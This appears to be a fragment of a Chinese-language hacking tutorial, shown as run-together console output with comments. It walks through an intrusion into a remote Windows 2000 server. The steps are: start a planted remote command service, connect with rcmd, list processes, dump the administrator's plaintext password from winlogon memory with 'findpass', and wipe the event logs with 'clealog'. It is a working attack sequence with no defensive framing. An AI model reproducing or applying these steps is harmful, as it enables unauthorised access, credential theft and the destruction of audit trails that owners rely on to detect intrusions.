c:\>sc \\xxx.xxx.xxx.xxx start "Remote Command Service"SERVICE_NAME: rpc support servicesTYPE : 10 WIN32_OWN_PROCESSSTATE : 2 START_PENDING(NOT_STOPPABLE,NOT_PAUSABLE,IGNORES_SHUTDOWN)WIN32_EXIT_CODE : 0 (0x0)SERVICE_EXIT_CODE : 0 (0x0)CHECKPOINT : 0x0WAIT_HINT : 0x7d0/*在这里我们用sc启动刚才创建的Remote Command Service服务。 */ /*下面连上对方服务器*/c:\>rcmdEnter Server Name : xxx.xxx.xxx.xxxConnect to \\xxx.xxx.xxx.xxxMicrosoft Windows 2000 [Version 5.00.2195](C) Copyright 1985-1999 Microsoft Corp.C:\Documents and Settings\Default User.WINNT >pulistProcess PID UserIdle 0System 8smss.exe 168 NT AUTHORITY\SYSTEMcsrss.exe 192 NT AUTHORITY\SYSTEMwinlogon.exe 212 NT AUTHORITY\SYSTEMservices.exe 240 NT AUTHORITY\SYSTEMlsass.exe 252 NT AUTHORITY\SYSTEMsvchost.exe 408 NT AUTHORITY\SYSTEMspoolsv.exe 436 NT AUTHORITY\SYSTEMmsdtc.exe 464 NT AUTHORITY\SYSTEMsvchost.exe 596 NT AUTHORITY\SYSTEMllssrv.exe 624 NT AUTHORITY\SYSTEMregsvc.exe 676 NT AUTHORITY\SYSTEMrpcsvc.exe 692 NT AUTHORITY\SYSTEMmstask.exe 716 NT AUTHORITY\SYSTEMLSESS.EXE 792 NT AUTHORITY\SYSTEMtlntsvr.exe 832 NT AUTHORITY\SYSTEMVrUpSvr.exe 956 NT AUTHORITY\SYSTEMwinmgmt.exe 968 NT AUTHORITY\SYSTEMdns.exe 980 NT AUTHORITY\SYSTEMdfssvc.exe 1064 NT AUTHORITY\SYSTEMPOP3S.exe 1100 NT AUTHORITY\SYSTEMsmtpds.exe 1120 NT AUTHORITY\SYSTEMsvchost.exe 1384 NT AUTHORITY\SYSTEMdllhost.exe 1316 NT AUTHORITY\SYSTEMinternat.exe 1308 SERVER\Administratorconime.exe 1680 SERVER\AdministratorVRMONSVC.EXE 872 NT AUTHORITY\SYSTEMinetinfo.exe 1456 NT AUTHORITY\SYSTEMexplorer.exe 1548 SERVER\Administratorcmd.exe 1712 SERVER\Guestpulist.exe 532 SERVER\Guest/*我们可以看到winlogon.exe的进程号是212*/ C:\Documents and Settings\Default User.WINNT>findpass server administrator 212To Find Password in the Winlogon processUsage: fidp DomainName UserName PID-of-WinLogonThe debug privilege has been added to PasswordReminder.T he WinLogon process id is 214 (0x000000d6).To find server\administrator password in process 214 ... The encoded password is found at 0x01a00800 and has a length of 3.The logon information is: server/administrator/Tgrh87fd.The hash byte is: 0xb8. /*在winlogon中查找administrator的名文口令*/C:\Documents and Settings\Default User.WINNT >clealogclealog done/*清除日志记录*/C:\Documents and Settings\Default User.WINNT> |